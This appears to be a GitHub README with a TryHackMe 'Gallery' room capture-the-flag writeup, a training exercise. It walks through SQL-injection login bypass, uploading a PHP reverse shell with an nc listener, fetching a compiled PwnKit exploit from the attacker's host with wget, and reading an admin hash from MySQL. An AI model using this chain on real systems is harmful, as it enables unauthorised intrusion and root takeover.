Skip to content

1337-L3V1ATH0N/Writeups

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

29 Commits
Proving Grounds Practice
Proving Grounds Practice
 
 
TryHackMe
TryHackMe
 
 
README.md
README.md
 
 

Repository files navigation

Tryhackme Gallery Room Writeup

  • Penetration Testing methodology

    • Scanning
      • Nmap Scan
    • Enumeration
      • Enumerating HTTP Service
      • Searching Exploit
      • Testing Login page
    • Exploitation
      • Reading exploit code
      • Trying exploit code
      • Finding another way to exploit cms
      • Uploading shell
    • Privilege Escalation
      • Enumerating kernel make
      • Searching Exploit
      • Compiling exploit
      • Transferring Binary
      • Getting Root Shell
      • Getting Answers

  • Walkthrough

    • There are two flags to find in this room 1. User flag 2. Root flag

    • Scanning IP with Nmap we get following output 1 Initialscanning

      We can see that on port 80 and on port 8080 http service is running, By visiting to the IP:Port we can see that on port 8080 we see 2 Visiting Simple Gallery Page I tried a payload of SQLi in Username : " ' or 1=1 -- " & Password : " a " but didn't worked. 6 Running SQLi

      So the CMS is Simple Image Gallery after searching it for on searchsploit we get following output 3 Searching Exploits

      Copying the exploit to current directory. 4 Copying exploit

      It's a good practice to read exploit. Even if you don't understand try to read some parts of it what and how it's doing. [ My Takeaway ]

      Before finding something i ran the code to check how the exploit works. 5 4 Running Exploit

      So the code was allowing us to execute commands via a parameter called cmd and it was uploaded in gallery/uploads directory. So i visited on the provided url and found that the code was executing. The output of whoami command. 5 5 Running Exploit

      AFter a lot of tries to gain reverse shell through cmd parameter i was frustrated then in a try i read the code [ My Takeaway :D ] content as follows: 5 1 Reading Exploit 5 2 Reading Exploit 5 3 Reading Exploit

      While reading i encountered a line which seemed to me a SQLi payload see below : 6 Reading Exploit

      So i got a hint that the payload which i was trying to use was not working for this room so i tried the payload which was used in exploit. 6 Running simple cms exploit sqli payload And boooom !! i was not expecting this but it worked... 7 We r in

      OKK !! We are in so now while walking an application i found a page " Albums " So after visiting i saw upload functionality. 7 1 moving

      I thought let's give it a try to upload a PHP reverse shell by Pentest Monkey ( can be found in /usr/share/webshells/php/ or can be found on google coz it's famous revershell script so will be easy to find ).

      So edited my reverse shell with my IP and my favorite port 6 3 Editing shell IP BTW out-of-topic : I am using 1337 coz not of i am leet but i want to be leet XD #HECKUR MINDSET

      Uploading the PHP Reverse Shell and listening on localhost via nc -lvnp 1337 [ for me it's 1337 you use what you typed the port to in script ] 7 2 Upload shellcode

      Shell Uploaded successfully !!!! 7 3 Shell uploaded

      By clicking on the script you uploaded you can activate the shell. But don't forget to listen before you activated the shell. 9 got shell

      Whoop Whoop we got shell... OKKK first things first let's stabilise our shell. I learned stabilising from What the Shell room on Tryhackme.

      • export TERM=xterm
      • which python3 [ Will allow to know what python is installed ]
      • python3 -c 'import pty;pty.spawn("/bin/bash")'
      • press CTRL+Z to bcakground the shell and also run the command on attacker machine
      • stty raw -echo ; fg
      • reset
      • [ This commands will give us a fully functional shell ] 9 1 Stabilising shell By resetting you get your shell reset like below a clean shell :D

  • Privilege Escalation TIIIIIIIIIIIME !!!!

    • For privesc you can run linpeas or any other script or may enumerate manually for escalation.

    • But in this writeup we will run PwnKit to learn some new about POLKIT pkexec module exploit. The exploit code can be found here -> https://github.com/ly4k/PwnKit/blob/main/PwnKit.c 10 enumerating privesc

    • Let's do this... Compiling the code by

    • gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC 11 1 pkexec binary We got the binary compiled and now let's move this to victim host.

      • 1st host a server on attacker machine we can do this by [Note : Host the server where your binary file is ! ]
        • Command : python3 -m http.server 80
      • 2nd Go to victim terminal and download the binary by following

        • Command : wget http://[attackerIP:PORT]/file_name 12 Tranferring binary

          Also note the workding directory i am in /dev/shm. You must have a writable permission on a directory. Like /tmp or /dev/shm or /var/tmp Now we got the binary so let's make it executable by using command :

          • chmod +x PwnKit Let's now run the binary 13 Got Shell

      Controlling Emotions of getting root shell ;-; So let's get the flags and end it ASAP.

      • /home/mike has user.txt
      • /root/ has root.txt 13 Flags txt Also we need hash of an admin user to complete the room
      • Use command netstat -altuopn for checking the services runnning on localhost
      • We can see 3306 is running which is mysql port.
      • Using mysql -u root -p [use password as root]
      • accessing the database.
      • and we got the admin hash submitting it and ok the room has been completed. 14 databases 14 2 databases 14 3 database hash

If any suggestions please advice.

About

Tryhackme Writeups

Resources

Readme
Activity

Stars

7 stars

Watchers

2 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published